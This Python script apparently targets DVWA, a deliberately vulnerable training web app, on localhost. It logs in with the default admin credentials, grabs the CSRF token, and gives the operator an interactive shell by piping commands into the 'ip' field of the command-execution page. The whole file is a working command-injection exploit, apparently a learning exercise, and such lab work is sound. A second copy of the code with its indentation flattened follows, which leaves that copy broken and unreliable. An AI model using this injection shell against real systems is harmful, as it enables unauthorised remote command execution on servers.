echel0nn/ornek2.py

## ornek2.py
#!/usr/bin/env python
import requests


def setSessionCookie(URL):
    pre_req = requests.get(URL)
    user_token = parseToken(pre_req.text)

    return pre_req.cookies, user_token

def parseToken(FULL_TEXT):
    HINT_STRING= "name='user_token'"
    text_list  = FULL_TEXT.split("\n")
    temp = ""
    for satir in text_list:
        if HINT_STRING in satir:
            temp = satir
        else:
            continue
    temp = temp.replace("<input type='hidden' name='user_token' value='","")
    temp = temp.split("'")
    userToken = temp[0]
    userToken = userToken.replace("\t","")
    return userToken

def parseCommandOutput(FULL_TEXT):
    HINT_STRING_START = "<pre>"
    HINT_STRING_STOP = "</pre>"
    text_list  = FULL_TEXT.split("\n")
    temp = ""
    isItOutput = False
    for satir in text_list:
        if HINT_STRING_START in satir:
            isItOutput = True
            temp += satir.replace("<pre>","").replace("\t\t","") + "\n"
            continue
        if HINT_STRING_STOP in satir:
            isItOutput = False
        if isItOutput:
            temp +=  satir + "\n"
    return temp

def getCredentials(USERNAME, PASSWORD):
    URL = "http://localhost/login.php"
    COOKIES, USER_TOKEN = setSessionCookie(URL)
    post_data = {'username': USERNAME, 'password': PASSWORD, 'Login': 'Login',
           'user_token': USER_TOKEN}
    post_request = requests.post(URL, data=post_data, cookies=COOKIES)
    return COOKIES

def komutCalistir(URL, COMMAND, COOKIES):
    post_data = { 'ip': "192.168.147.147\x7c" + COMMAND, 'Submit': 'Submit'}
    COMMAND_EXECUTION_REQUEST = requests.post(URL, data=post_data, cookies=COOKIES)
    outpt = parseCommandOutput(COMMAND_EXECUTION_REQUEST.text)
    print(outpt)


if __name__ == "__main__":
    URL = "http://localhost/vulnerabilities/exec/"
    COOKIES = getCredentials("admin", "password")
    while True:
        komut = str(input("[www-data]~>"))
        komutCalistir(URL, komut, COOKIES)
	#!/usr/bin/env python
	import requests


	def setSessionCookie(URL):
	pre_req = requests.get(URL)
	user_token = parseToken(pre_req.text)

	return pre_req.cookies, user_token

	def parseToken(FULL_TEXT):
	HINT_STRING= "name='user_token'"
	text_list = FULL_TEXT.split("\n")
	temp = ""
	for satir in text_list:
	if HINT_STRING in satir:
	temp = satir
	else:
	continue
	temp = temp.replace("<input type='hidden' name='user_token' value='","")
	temp = temp.split("'")
	userToken = temp[0]
	userToken = userToken.replace("\t","")
	return userToken

	def parseCommandOutput(FULL_TEXT):
	HINT_STRING_START = "<pre>"
	HINT_STRING_STOP = "</pre>"
	text_list = FULL_TEXT.split("\n")
	temp = ""
	isItOutput = False
	for satir in text_list:
	if HINT_STRING_START in satir:
	isItOutput = True
	temp += satir.replace("<pre>","").replace("\t\t","") + "\n"
	continue
	if HINT_STRING_STOP in satir:
	isItOutput = False
	if isItOutput:
	temp += satir + "\n"
	return temp

	def getCredentials(USERNAME, PASSWORD):
	URL = "http://localhost/login.php"
	COOKIES, USER_TOKEN = setSessionCookie(URL)
	post_data = {'username': USERNAME, 'password': PASSWORD, 'Login': 'Login',
	'user_token': USER_TOKEN}
	post_request = requests.post(URL, data=post_data, cookies=COOKIES)
	return COOKIES

	def komutCalistir(URL, COMMAND, COOKIES):
	post_data = { 'ip': "192.168.147.147\x7c" + COMMAND, 'Submit': 'Submit'}
	COMMAND_EXECUTION_REQUEST = requests.post(URL, data=post_data, cookies=COOKIES)
	outpt = parseCommandOutput(COMMAND_EXECUTION_REQUEST.text)
	print(outpt)


	if __name__ == "__main__":
	URL = "http://localhost/vulnerabilities/exec/"
	COOKIES = getCredentials("admin", "password")
	while True:
	komut = str(input("[www-data]~>"))
	komutCalistir(URL, komut, COOKIES)